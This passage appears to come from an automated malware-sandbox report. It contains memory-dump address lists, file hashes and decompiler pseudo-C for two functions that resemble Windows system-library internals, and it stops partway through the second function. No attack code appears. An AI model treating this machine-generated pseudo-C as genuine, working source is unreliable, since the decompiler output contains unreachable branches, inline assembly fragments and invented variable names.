0x04614442
0x04614447
0x00000000
0x0461419f
0x046141a3
0x046141b1
0x046141b9
0x046141bd
0x046145db
0x046145db
0x00000000
0x046141c3
0x046141c3
0x046141ce
0x046141d4
0x0465e138
0x0465e13e
0x0465e169
0x0465e16d
0x0465e19e
0x0465e16f
0x0465e16f
0x0465e175
0x0465e179
0x0465e18f
0x0465e193
0x00000000
0x0465e199
0x00000000
0x0465e199
0x0465e193
0x00000000
0x00000000
0x00000000
0x046141da
0x046141da
0x046141df
0x046141e4
0x046141ec
0x04614203
0x04614207
0x0465e1fd
0x04614222
0x04614226
0x0465e1f3
0x0465e1f3
0x0461422c
0x0461422c
0x04614233
0x0465e1ed
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x04614239
0x04614239
0x04614239
0x04614239
0x04614233
0x04614226
0x046141ee
0x046141ee
0x046141f4
0x04614575
0x0465e1b1
0x0465e1b1
0x00000000
0x0461457b
0x0461457b
0x04614582
0x0465e1ab
0x00000000
0x00000000
0x00000000
0x00000000
0x04614588
0x04614588
0x0461458c
0x0465e1c4
0x0465e1c4
0x00000000
0x04614592
0x04614592
0x04614599
0x0465e1be
0x00000000
0x00000000
0x00000000
0x00000000
0x0461459f
0x0461459f
0x046145a3
0x0465e1d7
0x0465e1e4
0x00000000
0x046145a9
0x046145a9
0x046145b0
0x0465e1d1
0x00000000
0x00000000
0x00000000
0x00000000
0x046145b6
0x046145b6
0x046145b6
0x00000000
0x046145b6
0x046145b0
0x046145a3
0x04614599
0x0461458c
0x04614582
0x00000000
0x00000000
0x00000000
0x00000000
0x046141f4
0x0461423e
0x04614241
0x046145c0
0x046145c4
0x00000000
0x046145ca
0x046145ca
0x00000000
0x0465e207
0x0465e20f
0x00000000
0x00000000
0x00000000
0x00000000
0x046145d1
0x00000000
0x00000000
0x046145ca
0x00000000
0x04614247
0x04614247
0x04614247
0x04614249
0x04614249
0x04614249
0x04614251
0x04614251
0x04614257
0x0461425f
0x0461426e
0x04614270
0x0461427a
0x0465e219
0x0465e219
0x04614280
0x04614282
0x04614456
0x046145ea
0x00000000
0x046145f0
0x0465e223
0x00000000
0x0465e223
0x0461445c
0x0461445c
0x00000000
0x0461445c
0x00000000
0x04614288
0x0461428c
0x0465e298
0x04614292
0x04614292
0x0461429e
0x046142a3
0x046142a7
0x046142ac
0x0465e22d
0x046142b2
0x046142b2
0x046142b9
0x046142bc
0x046142c2
0x046142ca
0x046142cd
0x046142cd
0x046142d4
0x0461433f
0x0461433f
0x046142d6
0x046142d6
0x046142d9
0x046142dd
0x046142eb
0x0465e23a
0x046142f1
0x04614305
0x0461430d
0x04614315
0x04614318
0x0461431f
0x04614322
0x0461432e
0x0461433b
0x0461433b
0x00000000
0x0461432e
0x046142eb
0x0461434c
0x0461434e
0x04614352
0x04614359
0x0461435e
0x04614361
0x0461436e
0x0461438a
0x0461438e
0x04614396
0x0461439e
0x046143a1
0x046143ad
0x046143bb
0x046143bb
0x046143ad
0x0461436e
0x046143bf
0x046143c5
0x04614463
0x04614463
0x046143ce
0x046143d5
0x046143d9
0x046143df
0x04614475
0x04614479
0x04614491
0x04614491
0x04614479
0x046143e5
0x046143eb
0x046143f4
0x046143f6
0x046143f9
0x046143fc
0x046143ff
0x046144e8
0x046144ed
0x046144f3
0x0465e247
0x00000000
0x046144f9
0x04614504
0x04614508
0x0461450f
0x0465e269
0x00000000
0x04614515
0x04614519
0x04614531
0x04614534
0x04614537
0x0461453e
0x04614541
0x0461454a
0x0465e255
0x0465e255
0x0465e25b
0x0465e25e
0x0465e261
0x0465e261
0x04614555
0x04614559
0x0461455d
0x0465e26d
0x0465e270
0x0465e274
0x0465e27a
0x0465e27d
0x0465e28e
0x0465e28e
0x04614563
0x04614563
0x04614569
0x04614569
0x00000000
0x0461455d
0x0461450f
0x00000000
0x046144f3
0x046143ff
0x04614405
0x04614405
0x04614405
0x046142ac
0x0461428c
0x04614282
0x04614407
0x0461440d
0x0465e2af
0x0465e2af
0x04614413
0x04614413
0x00000000
0x046141d4
0x00000000
0x046141c3
0x046141bd
0x04614415
0x04614415
0x04614416
0x04614417
0x04614429
0x0461416e
0x0461416e
0x04614175
0x04614498
0x0461449f
0x0465e12d
0x00000000
0x0465e133
0x00000000
0x0465e133
0x046144a5
0x046144a5
0x046144aa
0x00000000
0x046144bb
0x046144ca
0x046144d6
0x046144d7
0x046144d8
0x046144e3
0x046144e3
0x046144aa
0x0461417b
0x0461417b
0x0461417b
0x00000000
0x0461417b
0x04614175
0x00000000

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fd1fa643e26e30222e973bab89619536b101bd1bab77b4a451554eeafc83545
Instruction ID: 39f060c744fc1d6c562b11c76a553345ecf3579e652a4bf66730c5b84a5f6871
Opcode Fuzzy Hash: 6fd1fa643e26e30222e973bab89619536b101bd1bab77b4a451554eeafc83545
Instruction Fuzzy Hash: 6DF16C706083518BC724DF59C480A3AB7E1EF98758F18492EF886CB360FB35E981DB52

Uniqueness

Uniqueness Score: -1.00%

Function 046220A0, Relevance: .4, Instructions: 420
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E046220A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x46e8714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E04622EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E04622EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E045F58EC(_t240);
									_t221 =  *0x46e5cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x46e5cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E04634A2C(0x46e6e40, 0x4634b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E04617D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x45d5c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E0462F6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E0462F6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E04677016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L04612400(_t267 + 0x20);
															}
															L04612400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E04622397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E04612280(_t134, 0x46e8608);
									__eflags =  *0x46e6e48 - _t253; // 0x93afe8
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E0460FFB0(_t198, _t241, 0x46e8608);
										__eflags = _t253;
										if(_t253 != 0) {
											L046177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x46e6e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x46e8608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E04626B90(_t210,  &_v64);
										_t262 =  *0x46e8608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E0462E180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E046397C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E0463006A(0x46e8608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x46e8608);
												E0463B180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x46e6904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x46e6e48; // 0x93afe8
							_v72 = _t229;
							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								E0460FFB0(_t198, _t240, 0x46e8608);
								_t253 = _v76;
								goto L29;
							} else {
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E046300C2(0x46e8608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}

0x046220a0
0x046220a8
0x046220ad
0x046220b3
0x046220b8
0x046220c2
0x046220c7
0x046220cb
0x046220d2
0x04622263
0x04622266
0x04665836
0x04665836
0x00000000
0x0462226c
0x0462226c
0x04622270
0x04622274
0x046220e2
0x046220e2
0x046220e6
0x046220ee
0x046657dc
0x046657de
0x046657ec
0x046657ec
0x046657f1
0x046657f3
0x046657f8
0x00000000
0x046657f8
0x046657e0
0x046657e4
0x046657ea
0x00000000
0x00000000
0x00000000
0x046657ea
0x046220f4
0x046220f4
0x046220f8
0x046220f8
0x046220fc
0x04622100
0x04622106
0x04622201
0x04622206
0x0462220b
0x0462220e
0x046222a9
0x046222ac
0x00000000
0x00000000
0x046222b2
0x046222b5
0x04665801
0x04665806
0x00000000
0x00000000
0x04665810
0x04665815
0x04665818
0x00000000
0x00000000
0x0466581e
0x046222bb
0x046222bb
0x04622218
0x04622218
0x0462221c
0x04622220
0x04622222
0x046222c2
0x046222c4
0x046222dc
0x046222dc
0x046222e1
0x00000000
0x00000000
0x00000000
0x046222e7
0x046222c8
0x046222cd
0x046222d3
0x046222d6
0x04665823
0x04665825
0x04665827
0x00000000
0x00000000
0x0466582d
0x00000000
0x0466582d
0x00000000
0x04622228
0x04622228
0x00000000
0x04622228
0x04622222
0x04622214
0x04622214
0x00000000
0x04622114
0x04622114
0x04622114
0x0462211a
0x0462211c
0x04622348
0x0462234d
0x04665840
0x04665845
0x04665848
0x0466584e
0x0466584e
0x04665848
0x04622353
0x04622355
0x04622388
0x04622388
0x04622368
0x0462236a
0x0462236c
0x0462238f
0x00000000
0x0462236e
0x0462236e
0x0462218e
0x0462218e
0x04622191
0x04622195
0x04665a03
0x04665a06
0x04665a0c
0x04665a0f
0x04665a11
0x04665a13
0x04665a13
0x04665a19
0x04665a1f
0x00000000
0x0462219b
0x0462219b
0x046221a0
0x04622282
0x04622284
0x04622284
0x04622284
0x04622284
0x046221a6
0x046221a9
0x046221ac
0x046221ae
0x046221b3
0x0462228b
0x04622290
0x04622379
0x04622296
0x04622298
0x04622298
0x04622290
0x046221b9
0x046221be
0x046222a2
0x046222a2
0x046221c4
0x046221c8
0x046221cc
0x046221d0
0x046221d4
0x046221de
0x046221e3
0x04665a29
0x04665a2c
0x00000000
0x00000000
0x04665a3b
0x00000000
0x046221e9
0x046221e9
0x046221e9
0x046221ee
0x046221f1
0x04665a45
0x04665a4b
0x04665a52
0x04665a58
0x04665a5d
0x04665a5f
0x04665a71
0x04665a61
0x04665a6a
0x04665a6a
0x04665a76
0x04665a79
0x04665a7f
0x04665a83
0x04665a85
0x04665a87
0x04665a87
0x04665a8c
0x04665a91
0x04665a97
0x04665a9f
0x04665aa0
0x04665aa1
0x04665aa6
0x04665aab
0x04665ab1
0x04665ab3
0x04665ab9
0x04665aca
0x04665ad4
0x04665ad4
0x04665ade
0x04665ade
0x04665aab
0x04665a79
0x04665a52
0x046221f7
0x046221f9
0x046221fe
0x046221fe
0x046221e3
0x04622195
0x0462236c
0x04622122
0x04622122
0x04622124
0x04622231
0x04622236
0x04622236
0x04622238
0x04622238
0x04622240
0x04622242
0x04622244
0x046659fc
0x0462218c
0x0462218c
0x00000000
0x0462218c
0x0462224a
0x0462224f
0x04622256
0x04622304
0x04622309
0x0462230f
0x0462231e
0x0462231e
0x0462231e
0x04622320
0x04622325
0x0462232a
0x0462232c
0x0462233e
0x0462233e
0x00000000
0x0462232c
0x04622311
0x04622317
0x0462231a
0x0462231c
0x04622380
0x04622380
0x04622380
0x04622384
0x00000000
0x00000000
0x04622386
0x00000000
0x0462231c
0x0462225c
0x0462225c
0x00000000
0x0462225c
0x0462212a
0x04622134
0x04622138
0x0462213d
0x04665858
0x04665863
0x04665863
0x04665867
0x0466586a
0x00000000
0x00000000
0x0466586c
0x0466586c
0x04665871
0x04665875
0x04665877
0x04665997
0x0466599c
0x046659a1
0x046659a7
0x046659a7
0x00000000
0x046659a7
0x0466587d
0x00000000
0x0466588b
0x0466588b
0x04665890
0x04665892
0x04665894
0x04665899
0x0466589b
0x046658a0
0x046658a0
0x046658aa
0x046658b2
0x046658b6
0x046658be
0x046658c6
0x046658c9
0x0466590d
0x04665917
0x0466591a
0x0466591c
0x04665920
0x04665928
0x0466592a
0x0466592c
0x0466592e
0x0466592e
0x046658cb
0x046658cd
0x046658d8
0x046658e0
0x046658f4
0x046658fe
0x046658fe
0x0466593a
0x0466593e
0x04665940
0x04665942
0x00000000
0x04665944
0x04665944
0x04665949
0x0466594e
0x0466594e
0x04665953
0x0466595b
0x04665976
0x04665976
0x0466597a
0x0466597f
0x00000000
0x00000000
0x00000000
0x00000000
0x04665981
0x04665981
0x04665981
0x04665983
0x04665988
0x0466598d
0x04665991
0x04665991
0x00000000
0x0466595d
0x0466595d
0x04665963
0x04665965
0x00000000
0x00000000
0x00000000
0x00000000
0x04665967
0x04665967
0x0466596b
0x0466596d
0x00000000
0x00000000
0x0466596f
0x04665971
0x04665971
0x04665974
0x00000000
0x00000000
0x00000000
0x04665974
0x00000000
0x04665967
0x0466595b
0x04665942
0x04665863
0x04622143
0x04622143
0x04622149
0x0462214f
0x046222f1
0x046222f6
0x00000000
0x04622173
0x04622173
0x0462217d
0x04622181
0x04622186
0x046659ae
0x046659b2
0x046659b5
0x046659b7
0x046659ba
0x046659cd
0x046659d1
0x046659d5
0x046659d9
0x046659db
0x00000000
0x00000000
0x046659dd
0x046659dd
0x046659e1
0x046659e4
0x046659e7
0x046659ee
0x046659ee
0x046659f3
0x046659f3
0x00000000
0x04622186
0x0462214f
0x04622106
0x04622266
0x046220d8
0x046220da
0x046220e0
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c7fee05f38f168b523a11d26d9e9e947c6b999601d11eed7a99cdc1a7af0be7
Instruction ID: cfa4c6601d846012623b11efb478ce3216342a5f129e472e444071edd4c6abc3
Opcode Fuzzy Hash: 7c7fee05f38f168b523a11d26d9e9e947c6b999601d11eed7a99cdc1a7af0be7
Instruction Fuzzy Hash: 0EF10030A09751AFE725CF28C551B6A77E1AF94324F04899DE99A9B380F735F841CF82

Uniqueness

Uniqueness Score: -1.00%

Function 0460D5E0, Relevance: .4, Instructions: 353
COMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E0460D5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				signed int _t206;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				signed int _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				unsigned int _t297;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				signed int _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t361;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x46ed360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E04606600(0x46e52d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x46e7b9c; // 0x0
							_t281 = L04614620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E0463F3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x46e7b90; // 0x772a0000
								if(_t384 == 0) {
									_t353 =  *0x46e7b8c; // 0x933db8
									_v176 = _t353;
									_t320 = ( *(_t353 + 0x50))[8];
									_v184 = _t320;
								} else {
									E04612280(_t200, 0x46e84d8);
									_t277 =  *0x46e85f4; // 0x932b40
									_t351 =  *0x46e85f8 & 1;
									while(_t277 != 0) {
										_t337 =  *(_t277 - 0x50);
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t340 =  *(_t277 - 0x18);
													_t24 = _t277 - 0x68; // 0x932ad8
													_t353 = _t24;
													_v176 = _t353;
													__eflags = _t340[3] - 0xffffffff;
													if(_t340[3] != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t340 =  *(_t353 + 0x50);
														}
													}
													_v184 = _t340[8];
												}
											} else {
												_t339 =  *(_t277 + 4);
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E0460FFB0(_t287, _t353, 0x46e84d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E0464CC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
